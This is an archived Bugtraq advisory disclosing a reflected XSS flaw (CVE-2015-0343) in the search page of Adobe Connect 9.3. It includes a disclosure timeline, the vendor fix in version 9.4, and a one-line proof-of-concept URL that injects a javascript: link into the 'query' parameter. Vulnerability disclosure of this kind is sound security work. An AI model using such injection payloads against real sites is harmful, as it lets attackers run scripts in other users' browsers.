lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Thu, 11 Jun 2015 09:44:04 GMT
From: stasvolfus@...il.com
To: bugtraq@...urityfocus.com
Subject: XSS vulnerability Adobe Connect 9.3 (CVE-2015-0343 )

Advisory:		Adobe Connect Reflected XSS
Author:			Stas Volfus (Bugsec Information Security LTD)
Vendor URL:		http://www.adobe.com/ 
Status:			Vendor Notified


==========================
Vulnerability Description
==========================

Adobe Connect (Central) version: 9.3 is vulnerable to Reflected XSS (Cross Site Scripting).

The attack allows execution of arbitrary JavaScript in the context of the user’s browser.

CVE id: CVE-2015-0343  assigned  for this issue.



==========================
	PoC
==========================
The following URL demonstrates the vulnerability:

https://vulnerablewebsite.com/admin/home/homepage/search?account-id=1&filter-rows=1&filter-start=0&now=yes&query=<a href="javascript:alert('XSS')">XSS Link</a>



==========================
Disclosure Timeline
==========================

04-NOV-2014 - Vendor notified

01-DEC-2014 - CVE assigned

27-MAR-2015 - Resolved by vendor, fix deployed on Adobe Connect 9.4.


==========================
References
==========================
http://www.adobe.com/il_en/products/adobeconnect.html
https://helpx.adobe.com/adobe-connect/release-note/connect-94-release-notes.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ